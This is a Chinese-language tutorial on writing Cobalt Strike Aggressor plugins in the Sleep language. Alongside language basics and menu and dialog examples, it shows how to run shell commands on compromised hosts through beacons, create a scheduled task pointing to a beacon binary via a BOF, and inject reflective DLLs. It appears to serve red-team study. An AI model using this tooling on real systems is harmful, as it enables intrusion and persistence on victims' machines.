CNA插件开发

简介

Cobalt Strike的Aggressor脚本(.cna文件)是用一种名为Sleep的脚本语言编写的。Sleep语言是一种简洁的、动态类型的、类似Perl和JavaScript的语言,它被设计用来方便地进行脚本编写和快速原型开发

Sleep语言入门

变量

Sleep使用 $ 符号来定义变量。例如,$x = 5; 将变量 x 的值设置为5

数据类型

Sleep支持多种数据类型,这里主要讲两种,分别是数组(array)和哈希表(hash)

在 Sleep 中,你可以使用 @ 符号来创建数组。Sleep 还提供了一些函数来操作数组,例如 push()(将一个元素添加到数组的末尾)和 size()(获取数组的大小)

哈希表(也称为字典或映射)是一种可以存储键值对的数据结构。在 Sleep 中,你可以使用 % 符号来创建哈希表

# 创建一个空的数组
$my_array = @();

# 使用 push 函数将元素添加到数组的末尾
push($my_array, 1);
push($my_array, 2);
push($my_array, 3);

# 使用 size 函数获取数组的大小
$size = size($my_array);  # $size 的值现在是 3

println("Array: " . $my_array);  # 打印出 "Array: @(1, 2, 3)"
println("Size: " . $size);  # 打印出 "Size: 3"

# 创建一个空的哈希表
$my_hash = %();

# 将键值对添加到哈希表
$my_hash['key1'] = 'value1';
$my_hash['key2'] = 'value2';

# 获取哈希表的所有键和所有值
$keys = keys($my_hash);  # $keys 的值现在是 @('key1', 'key2')
$values = values($my_hash);  # $values 的值现在是 @('value1', 'value2')

println("Hash: " . $my_hash);  # 打印出 "Hash: %(key1 => 'value1', key2 => 'value2')"
println("Keys: " . $keys);  # 打印出 "Keys: @('key1', 'key2')"
println("Values: " . $values);  # 打印出 "Values: @('value1', 'value2')"

遍历操作

1.遍历数组:你可以使用 foreach 语句来遍历数组,如下所示,这个脚本会打印出数组中的每一个元素

$my_array = @(1, 2, 3, 4, 5);

foreach $element ($my_array) {
    println("Element: " . $element);
}

2.遍历哈希表:使用 foreach 语句来遍历哈希表。需要注意的是,遍历哈希表时,每一个元素都是一个键值对,如下代码会打印出哈希表种的每一个键和值

$my_hash = %(key1 => 'value1', key2 => 'value2');

foreach $pair ($my_hash) {
    $key = $pair[0];
    $value = $pair[1];
    println("Key: " . $key . ", Value: " . $value);
}

函数定义

你可以使用 sub 关键字来定义函数,如下代码所示, 在command定义中,$1表示第一个参数;command关键字用于定义一个新的命令,当你aggressor命令行输入MyAdd加参数,命令的代码就会被执行

sub add {
    $x = $1;
    $y = $2;
    return $x + $y;
}

command MyAdd{
	$sum = add($1,$2);
	println("result=".$sum);
}

aggressor命令行

查看帮助

点击Script Console打开脚本控制台

然后输入help查看命令帮助,我将这些命令及其对应的含义总结在以下表格中了

加载脚本

在aggressor命令行执行load命令加载cna文件,以下是一个简单的字符串输出脚本代码。输入myprint,控制台输出“hello world”

command myprint{
	println("hello world");
}

除此之外,在CS的文件目录还有一个agscript文件,它用于运行Aggressor脚本(.cna文件)。你可以使用agscript来启动一个新的Cobalt Strike客户端,连接到一个Cobalt Strike团队服务器,并运行一个或多个Aggressor脚本,agscript的基本用法如下:

agscript [options] <host> <port> <user> <pass> <script> [<script> ...]
  • <host><port><user><pass>用于指定要连接的Cobalt Strike团队服务器的详细信息。

  • <script>参数用于指定要运行的Aggressor脚本。你可以指定一个或多个脚本

例如,你可以使用以下命令来运行一个名为my_script.cna的Aggressor脚本。这将会启动一个新的Cobalt Strike客户端,连接到运行在本地(127.0.0.1)的Cobalt Strike团队服务器,然后运行my_script.cna脚本

agscript 127.0.0.1 50050 myuser mypass my_script.cna

设置输出字体颜色

在Aggressor脚本中,可以使用 \c 跟随一个数字来改变接下来的文本颜色,以下是\c 后跟随的数字与颜色的对应关系:

println("\c2This text is red.");
println("\c3This text is green.");
println("\c4This text is yellow.");
println("\c0This text is default color.");

CNA常用操作

绑定快捷键

使用关键字bind来绑定快捷键,以此执行指定的功能,如下代码绑定了快捷键Ctrl+H,当按了快捷键后会弹框提示“Hello World!”

bind Ctrl+H {
	show_message("Hello World!"); # 弹窗
}

菜单编写

1**.定义菜单**:使用popup函数定义一个新的菜单,如下所示,这将定义一个名为my_menu的新菜单

popup my_menu {
    # 菜单项将在这里定义
}

2.添加菜单项 :在 popup 块内部,使用 item 函数添加菜单项。如下所示,将在 my_menu 菜单中添加两个菜单项,名为 "Menu Item 1" 和 "Menu Item 2",当这些菜单项被点击时,会在控制台中打印相应的消息

popup my_menu {
    item("Menu Item 1", { println("You clicked Menu Item 1"); });
    separator();
    item("Menu Item 2", { println("You clicked Menu Item 2"); });
}

3.添加菜单到菜单栏:使用 menubar 函数将你的菜单添加到 Cobalt Strike 的菜单栏中,这将在菜单栏中添加一个新的菜单,名为 "My Menu",当你点击这个菜单时,会显示你之前定义的 my_menu 菜单

popup my_menu {
    item("Menu Item 1", { println("You clicked Menu Item 1"); });
    separator();
    item("Menu Item 2", { println("You clicked Menu Item 2"); });
}

menubar("My Menu", "my_menu");

如果你不想在菜单栏上创建新的菜单,而是想在默认的菜单上添加菜单项,例如你想在Help菜单添加菜单项,你可以这样做:

popup help {
    item("关于作者信息:", { show_message("作者是个大帅哥!") });
	sparator();
}

使用popup函数并指定beacon_bottom 作为参数可以在右键单击 Beacon 会话时添加一个自定义的上下文菜单

popup beacon_bottom{item("打开百度", {url_open("https://www.baidu.com"); });}

还可以通过menu语句来创建多级菜单,menu语句中还能再嵌套一个menu语句

popup beacon_bottom { 
    menu "beacon菜单" {
        menu "子菜单一" {
            item("子子菜单一", { show_message("这是子子菜单一"); });
            item("子子菜单二", { show_message("这是子子菜单二"); });
        }
        item("子菜单二", { show_message("这是子菜单二"); });
    }
}

编写对话框

以下代码编写了一个对话框,用于实现数据交互

# 在Beacon的右键菜单中添加一个新的菜单项 "添加用户",当这个菜单项被点击时,调用 mydialog 子程序。
popup beacon_bottom { item("添加用户", { mydialog(); }); }

# 这是一个回调函数,当对话框关闭时,会被调用。
# 它接收三个参数:对话框的引用,按钮的名称,以及一个包含用户输入的哈希表。
sub callback {
	show_message("用户添加成功!\n"."dialog的引用是:".$1."\n按钮名称是:".$2);
	println("用户名是:".$3["user"]."\n密码是:".$3["password"]."\n用户类型是: ".$3["user_type"]);# 这里callback函数接收到了dialog传递过来的三个参数
}

# 这是一个子程序,用于创建一个对话框,让用户输入用户名和密码。
# 它使用 dialog 函数创建一个对话框,设置了默认值,指定了回调函数。
# 它使用 drow_text 函数添加一个密码输入框。
# 它使用 dbutton_action 函数添加一个动作按钮,当用户点击这个按钮时,会触发回调函数。
# 它使用 dbutton_help 函数添加一个帮助按钮,当用户点击这个按钮时,会打开 http://www.baidu.com 网页。
# 最后,使用 dialog_show 函数显示对话框。
sub mydialog {
	$info = dialog("对话框的标题", %(user => "Administrator", password => ""), &callback); 
	drow_text($info, "user", "输入用户账号"); 
	drow_text($info, "password", "输入用户密码"); 
	drow_combobox($info,"user_type","用户类型",@("普通用户","管理员"));
	dbutton_action($info, "添加用户"); # 点击按钮,触发回调函数
	dbutton_help($info, "http://www.baidu.com"); # 显示帮助信息
	dialog_show($info); # 显示对话框
}

以下是编写对话框常用到的一些函数:

dialog 函数在 Aggressor 脚本中用于创建一个新的对话框,以用来显示消息,获取用户输入,或执行其他与用户交互的任务,基本语法如下(注意,虽然 dialog 函数创建了一个对话框,但它并不会立即显示这个对话框。要显示对话框,你需要使用 dialog_show 函数):

dialog(<标题>, <默认值>, <回调函数>)
  • <标题> 是一个字符串,用于设置对话框的标题。

  • <默认值> 是一个哈希表,用于设置对话框中各个字段的默认值。

  • <回调函数> 是一个函数,当对话框被关闭时,这个函数将被调用,对话框中用户输入的值将作为参数传递给这个函数

drow_text 函数用于在对话框中添加一个文本输入框。其基本语法如下

drow_text(<对话框>, <字段名>, <提示文本>)

这个函数接受三个参数:对话框(通过 dialog 函数创建),字段名(用于标识文本输入框),和提示文本(显示在文本输入框旁边的文本

dbutton_action 函数用于在对话框中添加一个动作按钮。当用户点击这个按钮时,会触发对话框的回调函数。这个函数接受两个参数:对话框(通过 dialog 函数创建)和按钮文本(显示在按钮上的文本)

dbutton_action(<对话框>, <按钮文本>)

dbutton_help 函数用于在对话框中添加一个帮助按钮。当用户点击这个按钮时,会在默认的网页浏览器中打开一个网页。其基本语法是

dbutton_help(<对话框>, <网址>)

drow_combobox函数用于在对话框中添加一个下拉列表(也称为组合框或combobox)。其基本语法如下:

drow_combobox($dialog, $key, $label, @options);
  • $dialog 是对话框的引用,通常是通过dialog函数创建的。

  • $key 是一个字符串,用于标识这个下拉列表。当用户在下拉列表中选择一个选项时,这个选项的值会被存储在对话框的数据中,可以通过这个键来访问。

  • $label 是一个字符串,用于显示在下拉列表旁边的标签。

  • @options 是一个数组,包含了下拉列表中的所有选项。

数据模型

Cobalt Strike的数据模型提供了一组功能,通过这些功能,你可以查询和操作Cobalt Strike中存储的各种数据。这包括目标信息、凭证、下载的文件、键盘记录等。这些功能通过一系列的函数提供,你可以在Aggressor脚本中使用这些函数

以下是一些常用的数据接口:

  • targets:用于查询和操作Cobalt Strike中存储的目标信息。

  • archives:用于查询Cobalt Strike最近的活动信息。

  • beacons:用于查询和操作Cobalt Strike中的Beacon会话。Beacon是Cobalt Strike的一个轻量级恶意软件,可以在受感染的主机上运行,并与团队服务器通信。

  • credentials:用于查询和操作Cobalt Strike存储的凭证信息。这些凭证可能是攻击者从目标系统上获取的密码、哈希值或Kerberos票据。

  • downloads:用于查询和操作Cobalt Strike下载的文件。

  • keystrokes:用于查询Cobalt Strike记录的键盘输入。

  • screenshots:用于查询Cobalt Strike获取的屏幕截图。

  • sites:这用于查询和操作Cobalt Strike托管的资产,例如监听器和stagers。

  • servers:用于查询和操作Cobalt Strike的团队服务器。

如下是使用targets函数查询beacon数据的实例:

  • x targets():这个命令返回了一个数组,数组中的每个元素都是一个哈希表,代表了一个目标。哈希表中包含了目标的地址('address')、操作系统('os')、主机名('name')和版本('version')。

  • x targets()[0]:这个命令返回了数组中的第一个元素,也就是第一个目标的信息。

  • x targets()[0]['address']:这个命令返回了第一个目标的地址。

Beacon

目标主机上线后,C2会为其分配一个唯一的随机数ID,我们可使用beacon_ids()来获取所有会话的ID

x beacon_ids()

获取到会话ID后,可使用beacon_info()来获取指定会话的所有数据

x beacon_info(beacon_ids()[0])

当然你还可以使用beacons()来获取所有会话的所有信息

beacon_initial是Cobalt Strike的Aggressor脚本中的一个预定义事件。当一个新的Beacon首次上线时,这个事件就会被触发,并返回一个会话ID($1

如下代码所示, 它会在新的Beacon首次上线时弹出一个消息框,显示Beacon的一些基本信息

# 当新的Beacon首次上线时
on beacon_initial {
    # 获取Beacon的ID
    $beacon_id = $1;

    # 获取Beacon的一些基本信息
    $user = beacon_info($beacon_id, "user");
    $host = beacon_info($beacon_id, "host");
    $pid = beacon_info($beacon_id, "pid");
    $os = beacon_info($beacon_id, "os");

    # 构造要显示的消息
    $message = "新的Beacon上线!\n\n";
    $message = $message . "User: " . $user . "\n";
    $message = $message . "Host: " . $host . "\n";
    $message = $message . "PID: " . $pid . "\n";
    $message = $message . "OS: " . $os . "\n";

    # 显示消息框
    show_message($message);
}

binput函数实际上是将字符串发送到Beacon的命令行, 其第一个参数是beacon的ID, 第二个参数是你想要输出至beacon命令行的字符串

# 当新的Beacon首次上线时
on beacon_initial {
    # 获取Beacon的ID
    $beacon_id = $1;
	
    binput($beacon_id, "有一个beacon上线了");
}

bshell函数用于在指定的beacon会话执行一个shell命令

# 当新的Beacon首次上线时
on beacon_initial {
    # 获取Beacon的ID
    $beacon_id = $1;
    binput($beacon_id, bshell(beacon_id,"whoami"));
}

常见示例

与BOF相关

涉及函数

script_resource(path):获取脚本资源的路径,当然不只限于bof(.obj)文件,还可以是exe、cna等等。要注意的是,脚本资源的路径要一定填写相对路径( 相对于cna文件)

openfreadb:打开文件并读取

bofpack:将参数打包成一个字节流,然后传递给BOF中的go函数,其语法格式如下:

bof_pack($beacon_id, "iz", $my_int, $my_string);

其中参数2是格式字符串,用于指定参数的类型,这个字符串可以包含以下字符:

  • i:表示一个32位整数。

  • I:表示一个64位整数。

  • d:表示一个双精度浮点数。

  • z:表示一个以null结尾的字符串。

  • Z:表示一个以null结尾的宽字符串(即,每个字符由两个字节表示)。

beacon_inline_execute:用于在指定的Beacon中执行一个BOF,该函数接收四个参数:

  • 参数一:Beacon的ID,这是一个整数,表示你想要在哪个Beacon中执行BOF。

  • 参数二:BOF的内容,这是一个字节流,通常是你从BOF文件中读取的内容。

  • 参数三:BOF中的函数名,这是一个字符串,表示你想要执行的函数。

  • 参数四:传递给BOF函数的参数,这是一个字节流,通常是你使用bof_pack函数创建的。

alias:在Cobalt Strike的Aggressor脚本中,commandalias都是用来定义新的命令的,但它们的使用场景是不同的

command函数定义的命令是在Cobalt Strike的脚本控制台中使用的,而alias函数定义的命令是在Beacon的命令行中使用的

实例演示

如下实例演示添加计划任务

# $1 = beacon ID
# $2 = task_name
# $3 = author
# $4 = description
# $5 = command
# $6 = args

alias boftask {
    # 检查参数数量是否正确
    if (size(@_) != 6){
        berror($1,"boftask: args error");
        return;
    }
		
    # 打开BOF文件并读取内容
    local('$handle $data $args'); #定义了三个局部变量
    $handle = openf(script_resource("BofTest.x64.obj"));  # 打开BOF文件
    $data = readb($handle, -1);  # 读取BOF文件的内容
    closef($handle);  # 关闭BOF文件
	
    # 设置参数
    # 使用bof_pack函数将参数打包成一个字节流
    # "ZZZZZ"表示我们有五个宽字符串参数,小写的z表示以null结尾的字符串
    $args = bof_pack($1, "ZZZZZ", $2, $3, $4, $5, $6);
	
    # 执行BOF
    # 使用beacon_inline_execute函数来执行BOF
    # "go"是BOF中的函数名,$args是传递给这个函数的参数
    beacon_inline_execute($1, $data, "go", $args);

    # 向用户通知任务已经开始
    # 使用btask函数在Beacon的控制台中显示一条消息
    btask($1, "Creating scheduled task as $2");
}

如下是bof的代码,此处我只给出了go函数的代码:

void go(char* buff, int len) {
	
	// datap是BOF框架中定义的结构体,用于解析从Beacon接收到的数据
	// 当你在Beacon执行BOF时,可以向BOF传递一些参数,这些参数会被打包成一个字节流
	// BOF会使用datap结构体来解析这个字节流,从而获取到传递的参数
	datap parser;

	// 设置创建的计划任务的相关信息
	wchar_t* task_name,
		* author,
		* description,
		* command,
		* args;

	// 初始化datap结构体变量(parser),用于解析从Beacon接收到的字节流(buff)
	BeaconDataParse(&parser, buff, len); 

	task_name = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取任务名
	author = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取作者名
	description = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取描述
	command = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取要执行的命令
	args = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取命令的参数

	if (!com_init()) // 初始化COM库
		return;

	if (!task_create(task_name, author, description, command, args)) // 创建计划任务
		
		return;

	CoUninitialize(); // 关闭COM库
}

beacon命令行执行:boftask "test" "henry" "this is bof" "C:\\beacon.exe" ""

查看目标主机的计划任务列表可以发现,计划任务成功添加上了

反射dll执行

涉及函数

bdllspawn是一种使用Cobalt Strike进行DLL注入的技术,它允许攻击者在新的或已存在的进程中注入并执行DLL。这种方法通常用于创建新的进程,并将恶意DLL加载到该进程中执行,但是创建新进程可能会引起安全软件的注意

bdllinject允许攻击者将DLL注入到已存在的进程中。这意味着攻击者可以选择一个正常运行的、不会引起怀疑的进程,并将其用作恶意DLL执行的宿主,如果选择的宿主进程被安全软件密切监控,或者如果DLL注入导致进程行为异常,这种方法可能会增加被检测的风险。相比bdllspawn,该函数无法在插件中实现传递参数给dll文件。

实例演示

如下Aggressor代码用于测试反射dll能否加载成功

# 测试反射dll注入
alias rdi_inject{
    local('$bid $dll $args');
    $bid = $1;
    $dll = "C:\\your.dll";
    btask($bid, "Injecting reflective dll into new process!(fork run)");
    bdllspawn($bid, $dll, "Hello World", "test dll", 5000);
}

如下cpp代码依赖ReflectiveDLLInjection项目,可以用lpReserved来传递参数给dll(注:如果要将传递的参数打印至beacon命令行界面,最好使用printf来输出,若以unicode形式来输出参数可能会出现乱码)

#include "ReflectiveLoader.h"
#include <iostream>

extern HINSTANCE hAppInstance;
EXTERN_C IMAGE_DOS_HEADER __ImageBase;

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
	BOOL bReturnValue = TRUE;
	DWORD dwResult = 0;

	switch (dwReason) {
	case DLL_QUERY_HMODULE:
		if (lpReserved != NULL)
			*(HMODULE*)lpReserved = hAppInstance;
		break;
	case DLL_PROCESS_ATTACH:
		hAppInstance = hinstDLL;
		fflush(stdout);
		if (lpReserved != NULL) {
			printf("Parameter: %s\n", (char*)lpReserved);
		}
		else {
			printf("No Parameter!");
		}
		
		fflush(stdout);
		ExitProcess(0);
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
		break;
	}
	return bReturnValue;
}

beacon命令行测试Dll能否运行成功

推荐编辑器

VS Code是一个非常流行的、功能丰富的代码编辑器,支持通过插件扩展其功能,可以安装CobaltStrike的官方插件来方便CNA脚本的编写

参考链接

  • https://cloud.tencent.com/developer/article/1785567

  • https://www.bilibili.com/video/BV1pU4y1C7xh/?spm_id_from=333.337.search-card.all.click&vd_source=a6caf742912abf241ffbcb3c11933841

  • https://maka8ka.cc/post/cobaltstrike-bof%E5%8F%8A%E5%AF%B9%E5%BA%94%E7%9A%84cna%E8%84%9A%E6%9C%AC/

  • https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/agressor_script.htm

最后更新于